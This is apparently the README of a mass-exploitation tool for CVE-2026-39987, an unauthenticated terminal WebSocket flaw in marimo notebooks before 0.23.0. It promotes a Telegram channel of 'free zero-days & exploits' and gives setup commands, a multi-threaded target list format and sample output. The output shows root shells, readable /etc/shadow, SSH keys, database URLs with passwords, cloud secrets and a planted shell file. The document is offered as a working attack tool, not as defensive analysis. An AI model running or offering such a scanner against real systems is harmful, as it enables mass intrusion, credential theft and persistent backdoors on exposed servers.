
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability
___ _ ___ __ __ __ __ ___ __ __ _______
/ (_)(_| |_// (_) / )/ \/ )/ / \/ |/ |/ \ /
| | | \__ /| | /| __ __/\_/|\_/|\__/ /
| | | / -----/ | |/ |/ \----- \ | |/ \ /
\___/ \_/ \___/ /___\__//___\__/ \___/ | |\__//
/terminal/ws — Unauthenticated WebSocket Pre-Auth RCE
Author: Nxploited · Telegram: @KNxploited
📢 Join the Telegram channel for the latest free zero-days & exploits:
🔗 Nxploited ZeroDay Hub — t.me/KNxploited
CVE-2026-39987 is a critical Pre-Authentication Remote Code Execution vulnerability affecting Marimo, an open-source reactive Python notebook platform.
The terminal WebSocket endpoint /terminal/ws completely lacks authentication validation, allowing any unauthenticated remote attacker to obtain a full PTY shell and execute arbitrary system commands with the privileges of the running process — often root inside containerized deployments.
Unlike other WebSocket endpoints such as /ws, which correctly invoke validate_auth() before accepting connections, the /terminal/ws endpoint only verifies the running mode and platform compatibility, entirely skipping authentication.
✅ Patched in:
marimo >= 0.23.0❌ All versions prior to0.23.0are vulnerable
| Property | Value |
|---|---|
| CVE ID | CVE-2026-39987 |
| Affected Software | marimo < 0.23.0 |
| Vulnerability Class | Pre-Auth RCE via Unauthenticated WebSocket |
| Affected Endpoint | /terminal/ws |
| Attack Vector | Network |
| Authentication Required | ❌ None |
| User Interaction | ❌ None |
| Severity | 🔴 Critical |
| Impact | Full PTY shell · Arbitrary command execution |
| Fixed Version | marimo 0.23.0 |
/ws → calls validate_auth() ✅ Authentication enforced
/terminal/ws → skips validate_auth() ❌ No authentication
The /terminal/ws handler only checks:
It never validates session tokens, cookies, or any form of identity — making every exposed Marimo instance a direct shell.
.py Marimo notebooks.env files · wp-config.php · SSH private keys · /etc/shadowPython 3.10 or higher
Install dependencies:
pip install websockets rich requests urllib3
Or using the requirements file:
pip install -r requirements.txt
requirements.txt
websockets
rich
requests
urllib3
Create a file named targets.txt with one target per line.
The tool accepts all formats:
192.168.1.100
192.168.1.101:2718
10.10.10.50:2718
https://notebook.example.com
wss://secure.notebook.io
marimo.target.local:2718
Supported formats: bare IP · IP:port · domain · domain:port ·
http://·https://·ws://·wss://
python3 CVE-2026-39987.py
▸ Targets file (default: targets.txt) : targets.txt
▸ Threads (default: 50) : 100
Thread range: 1–300. Recommended: 50–150 depending on your network.
╭──────────────────────────────────────────────────────────╮
│ CVE-2026-39987 · Marimo WebSocket RCE │
│ MASS SCANNER · FULL ENUM · SMART DETECT │
│ By: Nxploited · github.com/Nxploited · @KNxploited │
╰──────────────────────────────────────────────────────────╯
══════════════ ws://192.168.1.100:2718/terminal/ws ══════════
╭────────────────────────────────────────╮
│ ◈◈◈ ROOT ACCESS ◈◈◈ │
│ ws://192.168.1.100:2718 │
│ uid ▸ uid=0(root) groups=[root] │
╰────────────────────────────────────────╯
── ENVIRONMENT ──────────────────────────────────────────
✦ Type MARIMO
◈ Docker True
◈ Marimo version 0.22.1
◈ Notebook directory /app/notebooks
── MARIMO — NOTEBOOKS ───────────────────────────────────
✦ Notebooks 7 found
· /app/notebooks/analysis.py
· /app/notebooks/data_pipeline.py
· /app/notebooks/etl_job.py
── MARIMO — TOKENS ──────────────────────────────────────
✦ Token CLI secret-token-abc123xyz
✦ .marimo.toml /root/.marimo.toml
── /etc SENSITIVE ──────────────────────────────────────
✦ /etc/shadow READABLE [42 entries]
◈ /etc/passwd [42 lines]
◈ /etc/crontab [12 lines]
── SSH KEYS ─────────────────────────────────────────────
✦ /root/.ssh/id_rsa FOUND
✦ /root/.ssh/id_ed25519 FOUND
── DATABASES ────────────────────────────────────────────
✦ MySQL DATABASES LISTED
✦ Redis PONG — NO AUTH
✦ DuckDB files /app/notebooks/data.duckdb
── SENSITIVE ENV VARS ───────────────────────────────────
✦ DATABASE_URL postgresql://admin:p4ss@db:5432/prod
✦ AWS_SECRET_ACCESS_KEY redacted...
── NX FILE DROP ──────────────────────────────��──────────
✦ Shell write /app/notebooks/Nx.py
✦ HTTP access http://192.168.1.100:2718/Nx.py
── COMPLETE ─────────────────────────────────────────────
◈ Saved to nx_output/192.168.1.100_2718/
◦ 73/200 ROOT:5 PRIV:11 SHELL:18 FAIL:39 6.3/s
◦ 73/200 ROOT:5 PRIV:11 SHELL:18 FAIL:39 6.3/s